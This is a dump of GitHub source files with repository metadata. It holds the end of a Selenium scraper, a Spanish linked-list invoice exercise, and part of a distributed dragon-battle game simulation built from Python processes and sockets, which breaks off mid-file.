os.system(vpnon + str(iplist[count]%len(iplist)))\n\n # Create the profile with user-agent random\n profile = webdriver.FirefoxProfile()\n profile.set_preference(\"general.useragent.override\", UserAgent().random)\n profile.update_preferences()\n\n # The page of interest\n interestedpath= path + rangeofnumbered\n\n # Create the web driver\n driver = webdriver.Firefox(executable_path=geckopath, options=opts,\n firefox_profile=profile)\n\n\n print(\"good connection for \" + interestedpath )\n driver.implicitly_wait(waitingtime) # seconds\n driver.get(interestedpath)\n\n lookfor = driver.find_elements_by_class_name(interestedpattern)\n for item in lookfor:\n dataobtained.append(item.text)\n\n os.system(vpnoff)\n\n return dataobtained"
}
] | 1 |
richardnarvaez/lista_enlazada_factura
|
https://github.com/richardnarvaez/lista_enlazada_factura
|
aae0ade0c26fbec69addb49b39433ec3a75330d6
|
5442fc23318ca2791bd89960a58a171cf4dbd5d6
|
1c2a072c02dad00329a2fb00c9b13dc42243e2cf
|
refs/heads/master
| 2020-09-04T04:51:07.306228 | 2019-11-06T20:58:09 | 2019-11-06T20:58:09 | 219,661,733 | 0 | 0 | null | 2019-11-05T05:04:11 | 2019-11-05T20:13:50 | 2019-11-06T20:58:10 |
Python
|
[
{
"alpha_fraction": 0.3925081491470337,
"alphanum_fraction": 0.3925081491470337,
"avg_line_length": 44.37036895751953,
"blob_id": "9215b5ef174029d5bb0f02aef1935a1039eed7d7",
"content_id": "366438c393b04dba6cad9d776f6a6509f2d7f2d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1228,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 27,
"path": "/models/Invoice.py",
"repo_name": "richardnarvaez/lista_enlazada_factura",
"src_encoding": "UTF-8",
"text": "\nclass Invoice:\n def __init__(self, _code=None, _names=None, _lastNames=None, _date=None, _phone=None, _total=None, _list=None):\n self.code = _code # Codigo unico generado\n self.date = _date # Fecha generada\n self.total = _total # Suma de todos los produtos\n self.list = _list # Lista con Productos\n self.names = _names\n self.phone = _phone\n\n def printInvoice(self):\n print(\"\\t******************* FACTURA *********************\")\n print(\"\\t*************************************************\\n\")\n print(\"\\tFactura: \", self.code)\n print(\"\\tFecha: \", self.date)\n print(\"\\tNombres: \", self.names)\n print(\"\\n\\t******************** ITEMS **********************\")\n print(\"\\t*************************************************\\n\")\n\n nodeItem = self.list.getHead()\n while nodeItem != None:\n nodeItem.data.printProduct()\n nodeItem = nodeItem.next\n\n print(\"\\n\\t*************************************************\")\n print(\"\\t TOTAL: \", self.total)\n print(\"\\t*************************************************\")\n print(\"\\t-------------------------------------------------\\n\\n\\n\")\n\n\n"
},
{
"alpha_fraction": 0.5028741955757141,
"alphanum_fraction": 0.5079328417778015,
"avg_line_length": 27.605262756347656,
"blob_id": "5610edac113a9e4767275a070cbd4e3bfd7b628a",
"content_id": "b895b1f406e8c4240171354874b70971c5adb547",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4350,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 152,
"path": "/main.py",
"repo_name": "richardnarvaez/lista_enlazada_factura",
"src_encoding": "UTF-8",
"text": "\n'''\n Autor: Richard Vinueza\n Curso: Estructura de Datos - ESPOCH\n Ejercicio: Funcionamiento basico de FACTURAS con LISTAS enlazadas (PYTHON 3)\n IDE: PyCharm\n Version: v0.0.1\n Ejecutar: python main.py\n'''\n\n# Importaciones\n# --------------------\nfrom List import List\nimport Utils as utils\nfrom datetime import date\n\n# Modelos\nfrom models.Invoice import Invoice\nfrom models.Product import Product\n# --------------------\n\n\n# -------------------- MENU PRINCIPAL\ndef menu():\n print(\"\\n----------------------------------------\")\n print(\" [ FACTURAS ] \")\n print(\"----------------------------------------\\n\")\n print(\" 1. REGISTRAR FACTURA \")\n print(\" 2. ELIMINAR FACTURA \")\n print(\" 3. MOSTRAR NODOS \")\n print(\" 4. MOSTRAR LISTADO DE FACURAS \")\n print(\" 5. SALIR \")\n return input(\"\\n Ingrese opción : \")\n\n\n# -------------------- REGISTRAR ITEM\ndef registrar_products():\n listProducts = List() # Lista que llevara todos los Productos\n total = 0\n op = \"\"\n while op != \"n\":\n try:\n print(\"Ingresar NUEVO Item\")\n item = Product()\n item.name = input(\"Como se llama el PRODUCTO: \")\n item.price = float(input(\"Cual es el precio (Formato: 9.85): \"))\n item.count = int(input(\"Cuant@s -> \" + item.name + \" quieres?: \"))\n item.total = item.count * item.price\n listProducts.add_at_front(item)\n total += item.total\n op = input(\"Desea ingresar otro producto? (y/n)\").lower()\n except ValueError:\n print(\"\\t-------------------------------------\")\n print(\"\\tOcurrio un error al ingresar el ITEM!\")\n print(\"\\tEL ULTIMO PRODUCTO NO FUE AGREGADO!\")\n print(\"\\t-------------------------------------\\n\\n\")\n op = 'y'\n\n return listProducts, total\n\n\n# -------------------- REGISTRAR FACTURA\ndef registrar_factura(lista):\n item_invoice = Invoice()\n print(\"\\n\\n\\t[ REGISTRO ]\")\n print(\"\\t--------------------\")\n print(\"\\n\\tDATOS DE FACTURA \")\n\n item_invoice.code = utils.getRandomID()\n item_invoice.date = date.today().strftime(\"%b-%d-%Y\")\n\n print(\"\\tCODIGO: \", item_invoice.code)\n print(\"\\tFECHA: \", item_invoice.date)\n item_invoice.names = input(\"\\tNOMBRES:\")\n item_invoice.phone = input(\"\\tTELEFONO:\")\n\n # Registramos los Productos, como es otra lista tenemos una funcion separada.\n iproduct = registrar_products()\n item_invoice.list = iproduct[0] # Devuelve la LISTA de Productos\n item_invoice.total = iproduct[1] # Devuelve el valor total de la compra\n lista.add_at_front(item_invoice)\n\n\n# -------------------- MOSTRAR FACTURA\ndef mostrar_facturas(list):\n node = list.getHead()\n while node != None:\n node.data.printInvoice()\n node = node.next\n\n\n# -------------------- MOSTRAR NODOS\ndef mostrar_nodos(list):\n list.print_list()\n\n\n# -------------------- ELIMINAR FACTURA\ndef eliminar_factura(list):\n cod = input(\"Ingresa el codigo de la FACTURA que deseas BORRAR: \")\n list.delete_node(cod)\n return list\n\n\n# -------------------- ACTUALIZAR FACTURA\ndef actualizar_factura(list):\n print(\"Proximamente\")\n\n\n# -------------------- FUNCION PRINCIPAL\ndef main():\n out = False\n list_facturas = List()\n\n while not out:\n\n option = menu()\n utils.clear()\n\n if option <= \"0\" or option >= \"6\":\n print(\"\\nINGRESE UNA OPCION VALIDA...\\n\")\n\n elif option == \"1\":\n registrar_factura(list_facturas)\n\n elif option == \"2\":\n if list_facturas.is_empty():\n utils.emptyData()\n else:\n eliminar_factura(list_facturas).print_list()\n\n elif option == \"3\":\n if list_facturas.is_empty():\n utils.emptyData()\n else:\n mostrar_nodos(list_facturas)\n\n elif option == \"4\":\n if list_facturas.is_empty():\n utils.emptyData()\n else:\n mostrar_facturas(list_facturas)\n\n if option != \"5\":\n utils.pause()\n else:\n print(\"Saliendo...\")\n out = True\n\n utils.clear()\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.558987021446228,
"alphanum_fraction": 0.558987021446228,
"avg_line_length": 25.540983200073242,
"blob_id": "8897a7cf5867508b16be147fd4f17f6db58f0130",
"content_id": "405c3e8a22e2408169c0e3eebbc9a2e576fd0f76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1625,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 61,
"path": "/List.py",
"repo_name": "richardnarvaez/lista_enlazada_factura",
"src_encoding": "UTF-8",
"text": "\n# Creamos la clase NODO\nclass node:\n\n def __init__(self, _data=None, next=None):\n self.data = _data\n self.next = next\n\n\n# Creamos la clase List\nclass List:\n def __init__(self):\n self.head = None # Para enpezar el HEAD es nulo, por ende la sista esta VACIA\n\n # Método para agregar elementos al inicio\n def add_at_front(self, data):\n self.head = node(data, next=self.head)\n\n # Método para verificar si la estructura de datos esta vacia\n def is_empty(self):\n return self.head == None\n\n # Método para agregar elementos al final\n def add_at_end(self, data):\n if not self.head:\n self.head = node(data=data)\n return\n curr = self.headadd_at\n while curr.next:\n curr = curr.next\n curr.next = node(data=data)\n\n # Método para eleminar nodos\n def delete_node(self, key):\n curr = self.head\n prev = None\n while curr and curr.data.code != key:\n prev = curr\n curr = curr.next\n\n if prev is None:\n self.head = curr.next\n elif curr:\n prev.next = curr.next\n curr.next = None\n\n # Método para obtener el ultimo nodo\n def get_last_node(self):\n temp = self.head\n while (temp.next is not None):\n temp = temp.next\n return temp.data\n\n # Método para imprimir la lista de nodos\n def print_list(self):\n node = self.head\n while node != None:\n print(\"[\", node.data.code, \"]\", end=\" => \")\n node = node.next\n\n def getHead(self):\n return self.head"
},
{
"alpha_fraction": 0.4266054928302765,
"alphanum_fraction": 0.43119266629219055,
"avg_line_length": 19.809524536132812,
"blob_id": "afa786c4231d971eb55ec9449c4561408652cd70",
"content_id": "a785e35d875b90a42daee6cf229b238ab5563394",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 436,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 21,
"path": "/Utils.py",
"repo_name": "richardnarvaez/lista_enlazada_factura",
"src_encoding": "UTF-8",
"text": "import os\nimport uuid\n\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef pause():\n print(\"\\n--------------------------------------------- \")\n print(\" [ Press Enter to continue ] \")\n print(\"--------------------------------------------- \")\n input()\n\n\ndef emptyData():\n print(\"\\n\\tNo existen FACTURAS en este momento.....!!!!\\n\")\n\n\ndef getRandomID():\n return uuid.uuid4().hex[:4]"
},
{
"alpha_fraction": 0.49484536051750183,
"alphanum_fraction": 0.5051546096801758,
"avg_line_length": 31.22222137451172,
"blob_id": "fa449cbd03f3dc46531b073ab1792a0992dab129",
"content_id": "b6fdbdcc818751b73f1948d38ac1aca0d795ba64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 291,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 9,
"path": "/models/Product.py",
"repo_name": "richardnarvaez/lista_enlazada_factura",
"src_encoding": "UTF-8",
"text": "\nclass Product:\n def __init__(self, _name=None, _price=None):\n self.count = 0\n self.name = _name\n self.price = _price\n self.total = 0.0\n\n def printProduct(self):\n print(\"\\t\", self.count, \" \", self.name, \" \", self.price, \" \", self.total)\n"
}
] | 5 |
neverbeam/distributed-systems
|
https://github.com/neverbeam/distributed-systems
|
0bbec55915fd9895fc7672eec55e49437fce005f
|
ef8d63c15a54182c969069c37c2be1cbd52b4b78
|
466a34937267f249bf5bca14fdc45f69f50629d5
|
refs/heads/master
| 2020-04-06T23:40:23.554225 | 2019-01-16T21:01:55 | 2019-01-16T21:01:55 | 157,877,384 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4699978232383728,
"alphanum_fraction": 0.4854058027267456,
"avg_line_length": 36.84804916381836,
"blob_id": "d933ea8ea904e1385627e34242b06effef7835c4",
"content_id": "1d468273a3a45e3a97889e496b41e8555b23d28d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18432,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 487,
"path": "/populator.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "import multiprocessing as mp\nfrom distributor import Distributor\nfrom server import Server\nfrom client import Client\nimport time\nimport pandas\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport os\nimport sys\n\n\nclass Populator:\n def __init__(self, manual=False, experiment_num=0, experiment_arg=1):\n mp.set_start_method('spawn')\n self.commands = self.list_commands()\n self.keep_alive = True\n self.servers = {}\n self.clients = {}\n self.speedup = 1.0\n self.printing = False\n\n if manual:\n self.get_input()\n else:\n if experiment_num == 1:\n self.test_setup_2s_2c()\n elif experiment_num == 2:\n self.wow_setup()\n elif experiment_num == 3:\n self.test_setup_geo(experiment_arg, 100)\n elif experiment_num == 4:\n self.test_setup_max()\n\n # creates a running client\n def client_process(self, distr_port, play_time, lat, lng, demo=False):\n # Connect to the host\n c = Client(distr_port=distr_port, demo=demo, life_time=play_time, lat=lat, lng=lng, speedup=self.speedup, printing=self.printing)\n print(\"Created client process\")\n if c.joined_game:\n # Receive input from servers\n c.start_receiving()\n # let the client do moves until its playtime is up\n c.player_moves()\n\n # remove the player from the server\n c.disconnect_server()\n print(\"Closing client process connected to server on port \" + str(c.port))\n else:\n print(\"No game available\")\n\n\n # creates a running server\n def server_process(self, client_port, peer_port, distr_port, run_time, check_alive, ID, lat, lng, num_dragons=1):\n # Setup a new server\n s = Server(port=client_port, peer_port=peer_port, life_time=run_time, check_alive=check_alive,\n ID=ID, lat=lat, lng=lng, num_dragons=num_dragons, speedup=self.speedup, printing=self.printing)\n print(\"Created server process \" + str(client_port))\n # tell the distributor you exist\n s.tell_distributor(distr_port)\n # let the server handle all incoming messages\n s.read_ports()\n print(\"Server closed on port \" + str(client_port))\n\n\n # creates a running distributor\n def distributor_process(self, listen_port, run_time):\n if not self.printing:\n sys.stdout = open(os.devnull, 'w')\n d = Distributor(port=listen_port, life_time=run_time, speedup=self.speedup, printing=self.printing)\n print(\"Created distributor process \" + str(listen_port))\n # let the distributor listen to all incoming messages until lifetime is up\n d.read_ports()\n print(\"Distributor closed on port \" + str(listen_port))\n\n\n # runs a test version that should work (has 2 players and 2 servers)\n def test_setup_2s_2c(self):\n # allow printing to terminal\n self.printing = True\n # set a speedup factor for testing\n self.speedup = 2.0\n\n # initialize the distributor\n dp = 11000\n d = mp.Process(target=self.distributor_process, args=(dp, 23))\n d.start()\n time.sleep(0.3/self.speedup)\n\n servers = []\n num_servers = 2\n for i in range(num_servers):\n # run a server\n s = mp.Process(target=self.server_process, args=(10000+i, 10100+i, dp, 20, 1, i*100, 1, 1, 2.3))\n s.start()\n servers.append(s)\n time.sleep(0.1/self.speedup)\n\n # spawn a client process\n c1 = mp.Process(target=self.client_process, args=(dp, 15, 1, 1))\n c1.start()\n\n # spawn another client process\n time.sleep(1/self.speedup)\n c2 = mp.Process(target=self.client_process, args=(dp, 10, 1, 1))\n c2.start()\n\n # wait until the client processes terminate\n c2.join()\n c1.join()\n # then close the servers\n for s in servers:\n s.join()\n # then close the distributor\n d.join()\n\n\n # runs a test version pushing the bounds of player/server/player total\n def test_setup_max(self, num_servers=5, num_clients=100, speedup=1.0):\n self.speedup = speedup\n self.printing = True\n # initialize the distributor\n dp = 11000\n d = mp.Process(target=self.distributor_process, args=(dp, 45*self.speedup))\n d.start()\n time.sleep(0.3)\n\n servers = []\n for i in range(num_servers):\n # run a server\n server_id = i*1000\n s = mp.Process(target=self.server_process, args=(10000+i, 10100+i, dp, 40*self.speedup, 1, server_id, 1, 1, 4))\n s.start()\n servers.append(s)\n time.sleep(0.2)\n\n time.sleep(0.2)\n clients = []\n for i in range(num_clients):\n # spawn a client process\n c = mp.Process(target=self.client_process, args=(dp, 15*self.speedup, 1, 1))\n c.start()\n clients.append(c)\n time.sleep(0.0)\n\n # wait until the client processes terminate\n for c in clients:\n c.join()\n # then close the servers\n for s in servers:\n s.join()\n # then close the distributor\n d.join()\n\n\n # runs a test version based on geolocations\n def test_setup_geo(self, num_root_servers, num_players):\n # initialize the distributor\n dp = 11000\n # create a distributor that terminates after all servers are done\n d = mp.Process(target=self.distributor_process, args=(dp, num_players*2.7+3))\n d.start()\n time.sleep(0.5)\n\n # create servers with different geo locations\n servers = []\n space_between_servers = 1./num_root_servers\n for i in range(num_root_servers):\n sx = (i+1) * space_between_servers - space_between_servers/2.\n for j in range(num_root_servers):\n sy = (j+1) * space_between_servers\n # run a server on those latitude longitude\n server_num = (i*num_root_servers)+j\n # create servers that are closed when all players are done\n s = mp.Process(target=self.server_process, args=(10000+server_num, 10100+server_num, dp,\n num_players*2.5+1, 1, server_num*(num_players+1), sy, sx))\n s.start()\n servers.append(s)\n\n time.sleep(num_players*0.2)\n\n # create clients with random geo locations in [1,1]\n clients = []\n for i in range(num_players):\n x = random.random()\n y = random.random()\n # spawn a client process\n c = mp.Process(target=self.client_process, args=(dp, 2, y, x))\n c.start()\n clients.append(c)\n time.sleep(2)\n\n # wait until the client processes terminate\n for c in clients:\n c.join()\n # then close the servers\n for s in servers:\n s.join()\n # then close the distributor\n d.join()\n\n\n # use the game trace to create clients with a given lifespan\n def wow_setup(self):\n # setup for running game trace\n trace_start = time.time()\n sim_time = 60\n join_step = 2\n num_servers = 5\n dragons_per_server = 1\n self.printing = True\n self.speedup = 1\n\n # use for running multiple sims\n # self.printing = False\n # join_steps = [0.5, 0.7, 1]\n # for join_step in join_steps:\n # with open(\"join_step_results.txt\", \"a\") as join_step_results:\n # join_step_results.write(\"--------------\\njoin step: \"+str(join_step))\n # self.speedup = join_step/2\n # for n in range(4):\n\n try: \n # create a distributor that terminates after all servers are done\n dp = 11000\n d = mp.Process(target=self.distributor_process, args=(dp, sim_time*self.speedup))\n d.start()\n time.sleep(0.5)\n\n servers = []\n logfiles = []\n for i in range(num_servers):\n # run a server\n server_id = i*1000\n s = mp.Process(target=self.server_process, args=(10000+i, 10100+i, dp, (sim_time-5)*self.speedup, 1, server_id, 1, 1, dragons_per_server))\n s.start()\n servers.append(s)\n logfiles.append(\"logfile\"+str(server_id))\n time.sleep(0.2)\n\n # start populating\n clients = []\n play_dist = pickle.load( open( \"wow_trace.p\", \"rb\" ) )\n populating = True\n # keep adding players until end of simulation\n while (trace_start + (sim_time-10)*self.speedup) > time.time():\n # get a random lifetime from the wow distribution\n playtime = play_dist[random.randint(0, len(play_dist)-1)] / 100.0\n # create the client\n c = mp.Process(target=self.client_process, args=(dp,playtime*self.speedup,1,1))\n c.start()\n clients.append(c)\n # wait the set amount of time between adding players\n time.sleep(join_step)\n\n # close all still opened server connections\n for s in servers:\n s.join()\n # close all still opened client connections\n for c in clients:\n c.join()\n d.join()\n except OSError:\n print(\"Broke off because off to much clients. \")\n\n time.sleep(10)\n # analyze who won\n all_last_messages = \"\"\n dragon_win = 0\n player_win = 0\n invalids = 0\n for logfile in logfiles:\n with open(logfile, 'r') as f:\n lines = f.read().splitlines()\n for line in lines:\n if line == \"WIN DRAGONS\":\n dragon_win += 1\n break\n elif line == \"WIN PLAYERS\":\n player_win += 1\n break\n elif line == \"invalid update\":\n invalids += 1\n # show who won\n with open(\"join_step_results.txt\", \"a\") as join_step_results:\n if dragon_win == player_win:\n join_step_results.write(\"Draw\")\n elif dragon_win > player_win:\n join_step_results.write(\"Dragon win\")\n else:\n join_step_results.write(\"Player win\")\n join_step_results.write(str(invalids))\n\n\n # count and show the fraction of wrong moves for different latencies\n def test_setup_invalids(self):\n # try out latencies\n latencies = [0.0]\n n = 7\n\n with open(\"valid_counts.txt\", \"a\") as file_with_counts:\n file_with_counts.write(\"\\nNew run\\n\")\n\n for latency in latencies:\n print(\"Testing latency: \", latency)\n for ni in range(n):\n # setup for consistant latency\n sim_time = 60\n sx = 1\n sy = 0\n cx = 1 - latency\n cy = 0\n dragons_per_server = 1\n num_servers = 4\n num_clients = 20\n self.printing = False\n self.speedup = 0.5\n\n logfiles = []\n didnt_crash = False\n while not didnt_crash:\n try: \n # create a distributor that terminates after all servers are done\n dp = 11000\n d = mp.Process(target=self.distributor_process, args=(dp, sim_time*self.speedup))\n d.start()\n time.sleep(0.5)\n\n # add servers\n servers = []\n for i in range(num_servers):\n # run a server\n server_id = i*1000\n s = mp.Process(target=self.server_process, args=(10000+i, 10100+i, dp, (sim_time-5)*self.speedup, 1, server_id, sx, sy, dragons_per_server))\n s.start()\n servers.append(s)\n logfiles.append(\"logfile\"+str(server_id))\n time.sleep(0.2)\n\n # add clients\n clients = []\n for i in range(num_clients):\n # create the client\n c = mp.Process(target=self.client_process, args=(dp,(sim_time-10)*self.speedup,cx,cy))\n c.start()\n clients.append(c)\n time.sleep(3/float(num_clients))\n\n # close all still opened server connections\n for s in servers:\n s.join()\n # close all still opened client connections\n for c in clients:\n c.join()\n d.join()\n didnt_crash = True\n except OSError:\n print(\"Broke off because of to much clients. \")\n time.sleep(60)\n logfiles = []\n\n time.sleep(5)\n # count em all up\n all_last_messages = \"\"\n valids = 0\n invalids = 0\n for logfile in logfiles:\n with open(logfile, 'r') as f:\n lines = f.read().splitlines()\n for line in lines:\n if line == \"invalid update\":\n invalids += 1\n else:\n valids += 1\n # report them\n with open(\"valid_counts.txt\", \"a\") as file_with_counts:\n file_with_counts.write(str(latency)+\";\"+str(invalids)+\";\"+str(valids)+\"\\n\")\n\n\n\n # DEPRECATED, DOES NOT WORK ANYMORE\n # asks you for input, so that you can create/kill/list servers/clients\n def get_input(self):\n while self.keep_alive:\n print(\"-----COMMANDS-----\")\n for command in self.commands:\n print(command)\n print(\"------------------\")\n nocap_input = input().lower()\n # split on any whitespaces\n args = nocap_input.split()\n\n if len(args) > 1:\n # check to see if a quantity is given\n quantity = 1\n if len(args) >= 2:\n try:\n quantity = int(args[2])\n except (ValueError, TypeError):\n print(\"Not an integer quantity, setting to 1.\")\n\n # handles spawn input\n if args[0] == \"spawn\":\n name_i = 1\n if args[1] == \"s\":\n for i in range(quantity):\n name = None\n while name == None:\n try_name = \"s\" + str(i)\n if try_name not in self.servers.keys():\n name = try_name\n # create and start the process\n self.servers[name] = mp.Process(target=self.server_process, args=(10000,))\n self.servers[name].start()\n print(\"Added server: \" + name)\n elif args[1] == \"c\":\n for i in range(quantity):\n name = None\n while name == None:\n try_name = \"c\" + str(i)\n if try_name not in self.clients.keys():\n name = try_name\n # create and start the process\n self.clients[name] = mp.Process(target=self.client_process, args=(10000,))\n self.clients[name].start()\n print(\"Added client: \" + name)\n else:\n print(\"Pick s or c.\")\n\n # handles killing a given server/client\n elif args[0] == \"kill\":\n name = args[1]\n if name[0] == \"s\":\n if name in self.servers:\n # TODO: actually kill the servers process\n self.servers.pop(name, None)\n print(\"Succesfully terminated: \" + name)\n else:\n print(\"Dont recognise this server name\")\n elif name[0] == \"c\":\n if name in self.clients:\n # TODO: actually kill the clients process\n self.clients.pop(name, None)\n print(\"Succesfully terminated: \" + name)\n else:\n print(\"Dont recognise this client name\")\n else:\n print(\"Pick s or c.\")\n\n else:\n print(\"You have unrecognised input\")\n\n elif len(args) > 0:\n # show the lists of servers and clients\n if args[0] == \"list\":\n print(\"Servers:\")\n for name, s_obj in self.servers.items():\n print(\"\\t\" + name + \"\\t\" + str(s_obj))\n\n print(\"Clients:\")\n for name, c_obj in self.clients.items():\n print(\"\\t\" + name + \"\\t\" + str(c_obj))\n\n else:\n print(\"Need more arguments\")\n\n print() #empty line for style\n\n\n def list_commands(self):\n return [\n \"spawn [s/c] [quantity]\",\n \"kill [s/c + number]\",\n \"list\"\n ]\n\n\n\nif __name__ == '__main__':\n import sys\n experiment_num = int(sys.argv[1])\n experiment_arg = 0\n if experiment_num == 3:\n experiment_arg = int(sys.argv[2])\n p = Populator(manual=False, experiment_num=experiment_num, experiment_arg=experiment_arg)\n"
},
{
"alpha_fraction": 0.45675355195999146,
"alphanum_fraction": 0.4757108986377716,
"avg_line_length": 36.098899841308594,
"blob_id": "59165efa8e361cf998fd67d59a4fc9b63ac41eb3",
"content_id": "f9df2ba40e53b6b176b08bc99dd417b828525570",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3376,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 91,
"path": "/Game.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "from Player import *\nimport client\n\nclass Game:\n\n def __init__(self, upper, ID=1, max_player=100, max_dragon=25):\n self.ID = ID\n self.width = 25 + 1\n self.height = 25 + 1\n self.max_players = max_player\n self.max_dragons = max_dragon\n self.map = [[\"*\" for j in range(self.width)] for i in range(self.height)]\n self.players = {}\n self.upper = upper\n\n def add_player(self, player):\n \"\"\" Add players to the grid.\"\"\"\n if player.ID in self.players.keys():\n return\n\n if self.map[player.y][player.x] == \"*\":\n self.map[player.y][player.x] = player\n self.players[player.ID] = player\n print(\"Player ({0}) with hp {1} added to the game at position ({2},{3}).\".format(player.ID, player.hp, player.x, player.y))\n else:\n print(\"Error: Position ({0},{1}) is occupied with {2}\".format(player.x, player.y, self.map[player.y][player.x].ID))\n\n def remove_player(self, player):\n \"\"\" Remove players from the grid.\"\"\"\n y = player.y\n x = player.x\n if self.map[y][x] == \"*\":\n print(\"Error: Cannot remove player, spot {} {} is empty {}.\".format(player.y, player.x, player.ID))\n else:\n del self.players[player.ID]\n self.map[y][x] = \"*\"\n\n def update_grid(self, data):\n \"\"\"Update my grid\"\"\"\n #print (\"UPDATING GRID WITH: \", data)\n # timestamp;move;player;up/down/left/rigth\n data = data.split(\";\")[1:]\n\n try:\n if data[0] == \"move\":\n player = self.players[data[1]]\n self.map[player.y][player.x] = \"*\"\n if player.move_player(data[2]):\n self.map[player.y][player.x] = player\n print(\"new coordinates\", player.ID, player.y, player.x)\n return 1\n else:\n self.map[player.y][player.x] = player\n return 0\n # attack;player1;player2\n elif data[0] == \"attack\":\n player1 = self.players[data[1]]\n player2 = self.players[data[2]]\n if player1.attack(player2):\n return 1\n else:\n return 0\n # join;playerid;x;y;hp;ap\n elif data[0] == \"join\":\n player = Player(data[1], int(data[2]), int(data[3]), self)\n player.hp = int(data[4])\n player.ap = int(data[5])\n self.add_player(player)\n return 1\n elif data[0] == \"addeddragon\":\n player = Dragon(data[1], int(data[2]), int(data[3]), self)\n player.hp = int(data[4])\n player.ap = int(data[5])\n self.add_player(player)\n return 1\n elif data[0] == \"leave\":\n player = self.players[data[1]]\n self.remove_player(player)\n return 1\n elif data[0] == \"heal\":\n player1 = self.players[data[1]]\n player2 = self.players[data[2]]\n if player1.heal_player(player2):\n return 1\n return 0\n\n else:\n print(\"Not a valid command:\", data)\n return 0\n except KeyError as e:\n return 0\n"
},
{
"alpha_fraction": 0.4942176640033722,
"alphanum_fraction": 0.5024124979972839,
"avg_line_length": 39.052146911621094,
"blob_id": "bfb61f07b58d6ef33b75cde0daee00ddb14f63ca",
"content_id": "469f594a0a11ec0275ba5f72321b5bc0d54fd10e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13057,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 326,
"path": "/client.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "import socket\nimport select\nimport time\nfrom threading import Thread\nfrom queue import Queue\nimport Game\nfrom Player import *\nimport numpy as np\nimport os\nimport sys\n\nclass Client:\n def __init__(self, distr_port=11000, demo=False, life_time=1000, lat=1, lng=1, speedup=1.0, printing=True):\n self.joined_game = False\n self.demo = demo\n self.life_time = life_time\n self.start_time = time.time()\n self.speedup = speedup\n # do not print to terminal for experiments\n self.printing = printing\n if not self.printing:\n sys.stdout = open(os.devnull, 'w')\n self.keep_alive = True\n self.distr_port = distr_port\n self.lat = lat\n self.lng = lng\n self.latency = 0\n retries = 0\n max_retries = 5\n while retries < max_retries:\n server_port = self.get_server(self.distr_port)\n if server_port == 0:\n # set max_retries to stop searching, because there is no distributor\n retries = max_retries\n else:\n # try and connect to the given server\n self.sock, found = self.connect_server(port=server_port)\n # if given server was not valid, try for another\n if not found:\n retries += 1\n else:\n # found one, stop searching\n retries = max_retries\n # do not let the client play a game if there is no game\n if server_port != 0:\n # no distributor up and running\n self.joined_game = True\n self.queue = Queue()\n\n def receive_grid(self, sock):\n \"\"\" Receive the current state of the grid from the server. \"\"\"\n try:\n self.game = Game.Game(self)\n data = \"\"\n # Keep receiving until an end has been send. TCP gives in order arrival\n while True:\n data += sock.recv(128).decode('utf-8')\n if data[-3:] == \"end\":\n break\n\n #Parse the data so that the user contains the whole grid.\n\n # type, ID, x, y, hp , ap,\n data = data[:-3].split(\";\")\n del data[-1]\n for i in range(0, len(data), 6):\n playerdata = data[i:i+6]\n if playerdata[0] == \"Player\":\n player = Player(playerdata[1], int(playerdata[2]), int(playerdata[3]) ,self.game)\n player.hp = int(playerdata[4])\n player.max_hp = int(playerdata[4])\n player.ap = int(playerdata[5])\n\n elif playerdata[0] == \"Dragon\":\n player = Dragon(playerdata[1], int(playerdata[2]), int(playerdata[3]) ,self.game)\n player.hp = int(playerdata[4])\n player.max_hp = int(playerdata[4])\n player.ap = int(playerdata[5])\n\n elif playerdata[0] == \"Myplayer\":\n player = Player(playerdata[1], int(playerdata[2]), int(playerdata[3]) ,self.game)\n player.hp = int(playerdata[4])\n player.max_hp = int(playerdata[4])\n player.ap = int(playerdata[5])\n self.myplayer = player\n\n self.game.add_player(player)\n\n print ( \"succesfully received grid\")\n except ConnectionResetError:\n print(\"Retrying connection setup between client to server\")\n return False\n\n return True\n\n def get_server(self, distr_port=11000):\n \"\"\"talk to the distributor to get a server port to connect to\"\"\"\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n try:\n # send a message to the distributor\n s.connect(('localhost', distr_port))\n except ConnectionRefusedError:\n # no distributor up and running\n return 0\n lat_str = \"{:.4f}\".format(self.lat)\n lng_str = \"{:.4f}\".format(self.lng)\n send_data = \"CLIENT|\" + lat_str + \";\" + lng_str\n s.sendall(send_data.encode('utf-8'))\n # get a server port back from the distributor\n data = s.recv(1024)\n message = data.decode('utf-8')\n if message.startswith('DIST|'):\n dist_mess = message.split(\"|\")\n if len(dist_mess) != 3:\n # ill defined message\n pass\n else:\n try:\n # get the game server and latency from the distributor\n server_port = int(dist_mess[1])\n latency = float(dist_mess[2])\n self.latency = latency\n return server_port\n except ValueError:\n # message was not an integer\n pass\n # distributor did not respond, should not happen\n print(\"ERROR: no distributor response\")\n return 0\n\n def connect_server(self, port=10000):\n \"\"\" Connect to the server. \"\"\"\n # this happens when there is no distributor\n if port == 0:\n return 0, False\n\n self.port = port\n\n 